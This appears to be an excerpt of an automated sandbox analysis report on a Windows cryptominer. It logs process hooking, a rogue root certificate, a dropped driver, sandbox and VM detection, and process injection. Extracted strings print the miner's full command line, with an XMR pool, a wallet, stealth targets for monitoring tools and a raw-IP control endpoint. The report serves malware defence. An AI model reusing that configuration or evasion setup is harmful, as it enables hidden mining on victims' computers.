          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
          Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Contains functionality to compare user and computer (likely to detect sandboxes)
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,14_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,42_2_00000001400010C0
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D1F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIALER.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:8080--USER=4335MEZGWWSMBW161UQP6WAQYXZTRVXWSBPKZPXTXXAH4MTOXXBIERHGBAB8XHDZAEMKWWVNP49WWK5RIBJ37AK2AZKAEKR--PASS=XC--CPU-MAX-THREADS-HINT=30--CINIT-WINRING=FTNVUQWJTDWB.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-API=HTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHP--CINIT-VERSION=3.4.0--CINIT-IDLE-WAIT=15--CINIT-IDLE-CPU=80--CINIT-ID=LDNDHOAIFLKHPADL
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D1F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEC
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: dialer.exe, 0000002D.00000003.2147213918.0000021C6D181000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHPLDNDHOAIFLKHPADL
          Source: dialer.exe, 0000002D.00000003.2147213918.0000021C6D181000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002D.00000002.3378194513.0000021C6D206000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEMN
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5991Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3829Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8510Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1488Jump to behavior
          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9928Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7178
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2346
          Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9874Jump to behavior
          Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1803
          Source: C:\ProgramData\IGaming\driver.exeDropped PE file which has not been started: C:\Windows\Temp\ftnvuqwjtdwb.sysJump to dropped file
          Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_27-14949
          Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_30-14927
          Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-480
          Source: C:\Users\user\Desktop\file.exeAPI coverage: 3.1 %
          Source: C:\ProgramData\IGaming\driver.exeAPI coverage: 3.1 %
          Source: C:\Windows\System32\lsass.exeAPI coverage: 6.6 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\dialer.exeAPI coverage: 0.9 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
